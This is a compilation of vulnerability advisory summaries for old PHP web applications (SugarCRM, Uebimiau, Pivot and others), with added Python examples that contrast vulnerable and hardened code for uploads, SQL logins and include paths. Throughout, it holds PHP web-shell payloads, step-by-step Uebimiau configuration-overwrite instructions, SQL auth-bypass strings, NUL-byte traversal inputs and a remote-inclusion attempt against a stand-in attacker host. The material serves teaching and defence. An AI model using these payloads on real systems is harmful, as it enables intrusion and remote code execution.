The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'u' parameter to 'index.php', 'full.php' and 'contact.php' scripts. This can be exploited to include arbitrary files from local resources via directory traversal attacks.
DB Top Sites v1.0 is vulnerable to Remote Command Execution. The 'location' field submitted when registering as a user is written unfiltered into a file named 'username.php' in the 'sites' directory, so PHP code placed in that field is stored on the server as an executable script. The attacker then requests that file and the injected code runs with the web server's privileges.
Multiple Vulnerabilities exist in the FormMail software. The input validation code is at line 283 (the $safeConfig array definition) and line 518 (the definition of clean_html). The clean_html function is used to sanitize user input, but it is not sufficient to prevent Cross Site Scripting or HTTP Response Header Injection.
A Remote Code Execution Vulnerability exists in SugarCRM, in the "Compose Email" section. The software permits sending email with attachments (unless disabled by the administrator). When a file name is supplied, a validation routine compares its extension against the "upload_badext" array, a blacklist of extensions that may not be uploaded. The routine inspects only the extension and never the content of the file, so it is a name check rather than a type check. An attacker can therefore take a PHP payload (a file that would normally carry a blacklisted extension such as ".php"), rename it to an extension that is not blacklisted (for example ".txt") so that the check passes, and upload it; according to the advisory the attacker can then execute it by accessing its URL.
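To make the difference between an extension-only blacklist and a real type check concrete, here is an added Python example (not SugarCRM's code). The UPLOAD_BADEXT set is an assumed stand-in for the application's upload_badext array, the allowlist of types and their magic numbers is the author's choice, and the sample file bodies are constructed. blacklist_check reproduces the pattern the advisory describes; validate_upload shows the checks that close it, and stored_name shows why the client should never choose the on-disk name.

```python
import os
import re
import secrets

# Assumed blacklist standing in for SugarCRM's upload_badext array (the real
# list lives in the application's configuration and is not reproduced here).
UPLOAD_BADEXT = {"php", "php3", "php4", "php5", "phtml", "phps", "pl", "cgi", "exe", "sh"}

# Extensions the hardened check accepts, each with the magic bytes a file of
# that type must start with (empty tuple = no magic number, text-only checks).
ALLOWED_TYPES = {
    "txt": (),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Full and echo open tags; the deprecated short tag "<?" alone is not matched
# so that XML declarations in text files are not rejected.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def blacklist_check(filename):
    """Extension-only blacklist check, the pattern the advisory describes.

    Only the client-supplied name is examined; the file body is never read,
    so PHP code under an allowed extension passes unchallenged.
    """
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    return ext not in UPLOAD_BADEXT


def validate_upload(filename, content):
    """Hardened check: allowlisted extension, magic number and body inspection.

    Returns (accepted, reason).
    """
    name = os.path.basename(filename)
    # Exactly one dot and a conservative character set: rejects double
    # extensions, path separators, NUL bytes and Unicode tricks in one go.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}", name):
        return False, "bad filename"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    magics = ALLOWED_TYPES[ext]
    if magics and not content.startswith(magics):
        return False, "content does not match declared type"
    if ext == "txt":
        try:
            content.decode("utf-8")
        except UnicodeDecodeError:
            return False, "not a text file"
    # Interpreter tags anywhere in the body are rejected regardless of type:
    # a polyglot (valid PNG header followed by PHP) would otherwise pass.
    if PHP_TAG.search(content):
        return False, "embedded PHP tags"
    return True, "ok"


def stored_name(ext):
    """Server-chosen storage name. The client controls neither the name nor
    the extension on disk, so a later rename of the uploaded file is not
    something the upload path can be tricked into."""
    if ext not in ALLOWED_TYPES:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    payload = b"<?php system($_GET['cmd']); ?>"
    print("blacklist, shell.php:", blacklist_check("shell.php"))
    print("blacklist, shell.txt:", blacklist_check("shell.txt"))
    print("hardened,  shell.txt:", validate_upload("shell.txt", payload))
    print("hardened,  notes.txt:", validate_upload("notes.txt", b"hello\n"))
```

The hardened version still does not make the upload directory safe to serve; storing uploads outside the web root, or with a handler that refuses to execute anything in that directory, is the control that holds even when every check above is bypassed.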
Mundi Mail is prone to a local/remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary local or remote files, allowing for the execution of arbitrary PHP code. This issue affects the 'template/simpledefault/admin/_masterlayout.php' script. Remote file inclusion requires register_globals and allow_url_fopen to be enabled; local file inclusion is possible when magic_quotes_gpc is disabled.
Impleo Music Collection 2.0 is vulnerable to SQL Injection (Auth Bypass) and Cross Site Scripting. The vulnerable code is present in /admin/login.php, where the user input is not properly sanitized. An attacker can exploit this vulnerability to bypass authentication and execute arbitrary SQL commands. An attacker can also inject malicious JavaScript code in the application to perform Cross Site Scripting attacks.
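An added example of the authentication-bypass half of this entry, written in Python against an in-memory SQLite table; it is not code from Impleo Music Collection, and the table, the user rows and the payload strings are all constructed. login_vulnerable builds the query by string concatenation, the pattern described for /admin/login.php; login_fixed is the same query with bound parameters.

```python
import sqlite3

# Constructed in-memory table standing in for the application's user table.
# Passwords are stored as given here; whatever the real application stores
# does not affect the injection, which rewrites the WHERE clause itself.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users (username, password) VALUES (?, ?)",
    [("admin", "s3cret-admin"), ("alice", "wonderland")],
)


def login_vulnerable(username, password):
    """Query assembled by string concatenation. Returns the authenticated
    username, or None when no row matches."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(username, password):
    """Same query with bound parameters: the driver sends the values
    separately from the statement, so they are never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Constructed bypass payloads (not taken from the advisory). The first comments
# out the password predicate; the second makes the whole predicate true and
# logs in as whichever row the database returns first.
BYPASS_COMMENT = "admin' -- "
BYPASS_OR = "' OR '1'='1' -- "


if __name__ == "__main__":
    for user, pw in [("admin", "s3cret-admin"), (BYPASS_COMMENT, "anything"), (BYPASS_OR, "anything")]:
        print(repr(user), "vulnerable ->", login_vulnerable(user, pw),
              "| fixed ->", login_fixed(user, pw))
```

The rendered vulnerable statement for the first payload is `... WHERE username = 'admin' -- ' AND password = 'anything'`; everything after `--` is a comment, so the password is never compared. Escaping quotes (the magic_quotes_gpc approach of the era) narrows the attack but does not remove it; parameter binding does.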
A vulnerability in Joomla Component Com_Projectfork allows an attacker to include local files on the server. This vulnerability is due to insufficient sanitization of user-supplied input to the 'section' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters to the vulnerable script. This may allow the attacker to include arbitrary local files on the server, resulting in the disclosure of sensitive information.
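The traversal in the 'section' parameter here, the 'u' parameter in the first entry, and the magic_quotes_gpc / allow_url_fopen conditions in the Mundi Mail entry all come down to one pattern: a request parameter concatenated into an include() path. The following Python script is an added example and not code from any of the affected projects. It emulates the vulnerable PHP include against a constructed directory layout (the page names and file contents are made up), including the NUL-byte truncation that drops the appended '.php' and the effect magic_quotes_gpc has on it, beside a hardened resolver. Python's open() does not fetch URLs, so the remote-inclusion attempt only demonstrates the hardened rejection; in PHP with allow_url_fopen enabled the naive version would fetch and execute the remote file.

```python
import os
import re
import tempfile

# Constructed layout: a "pages" directory holding the includable scripts and
# two files outside it that an attacker would want to read.
ROOT = tempfile.mkdtemp(prefix="lfi_demo_")
PAGES = os.path.join(ROOT, "pages")
os.makedirs(PAGES)
for page in ("index", "full", "contact"):
    with open(os.path.join(PAGES, page + ".php"), "w") as fh:
        fh.write("<?php /* %s page */ ?>" % page)
with open(os.path.join(ROOT, "config.php"), "w") as fh:
    fh.write("<?php $db_pass = 'hunter2'; ?>")
with open(os.path.join(ROOT, "secret.txt"), "w") as fh:
    fh.write("TOP SECRET notes")

ALLOWED_PAGES = {"index", "full", "contact"}


def magic_quotes_gpc(value):
    """Emulates what PHP's magic_quotes_gpc did to request data: backslash,
    quotes and NUL bytes are escaped, so a NUL arrives as the two characters
    backslash-zero and no longer truncates the path."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\0", "\\0"))


def naive_include_path(u):
    """Emulates include($base . $_GET['u'] . '.php') with no sanitization.

    The path is cut at the first NUL byte, as the C-level open() under PHP
    would do; that is what lets an attacker discard the appended '.php'.
    """
    return (PAGES + "/" + u + ".php").split("\0", 1)[0]


def safe_include_path(u):
    """Hardened resolution: strict name allowlist plus a canonical-path check.

    Either check alone stops the traversal; keeping both means a future
    change to the allowlist cannot silently reintroduce the escape.
    """
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,32}", u) or u not in ALLOWED_PAGES:
        raise ValueError("page name not allowed")
    base = os.path.realpath(PAGES) + os.sep
    candidate = os.path.realpath(os.path.join(PAGES, u + ".php"))
    if not candidate.startswith(base):
        raise ValueError("path escapes page directory")
    return candidate


def include_result(resolver, u):
    """Run one include attempt; return the text read or the failure reason."""
    try:
        with open(resolver(u)) as fh:
            return fh.read()
    except (ValueError, FileNotFoundError) as exc:
        return "REJECTED (%s)" % type(exc).__name__


if __name__ == "__main__":
    attempts = ["index", "../config", "../secret.txt", "../secret.txt\0",
                "http://evil.example/shell.txt"]
    for u in attempts:
        print(repr(u))
        print("  naive            :", include_result(naive_include_path, u))
        print("  naive+magicquotes:", include_result(lambda v: naive_include_path(magic_quotes_gpc(v)), u))
        print("  hardened         :", include_result(safe_include_path, u))
```

Two things the run makes visible: "../config" succeeds against the naive resolver without any NUL trick because the target already ends in '.php', and "../secret.txt" only succeeds with a trailing NUL and magic_quotes_gpc off, which is exactly the condition the Mundi Mail entry states.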
Uebimiau Webmail v3.2.0-1.8 is vulnerable to a remote file write (configuration overwrite) that leads to code execution. An attacker opens the /uebimiau/admin/editor.php?load=config page, enters PHP code such as <?php passthru($_GET[cmd]); ?> and clicks the 'Write To File' button, which overwrites the configuration file with the supplied code. Requesting /uebimiau/index.php?cmd=id then executes the injected code, since index.php loads the overwritten configuration.
transLucidonline is an easy website publishing system with which anyone can create and maintain web content, in multiple languages and based on a growing list of ready-made, professional layouts. Cross Site Scripting vulnerabilities were found in the NodeID and action parameters, in both the admin and public panels. HTML Injection vulnerabilities were found in the Title and Url fields when editing a page, as well as when creating a new page. Injections can also be executed when switching the theme to Developer.
Pivot is a web-based tool to help maintain dynamic sites, like weblogs or online journals. It is written in PHP and does not require additional libraries or databases to function. The vulnerabilities are present in the url, menu, sort, check[], edituser, edit, blog and cat parameters. Path disclosure can be triggered by sending a request to tb.php with a valid tb_id. Cross Site Scripting can be triggered both when not logged in and when logged in as an administrator. HTML Injection can be triggered by sending a request to index.php with a valid sort parameter. Cross Site Scripting can also be triggered using the POST method.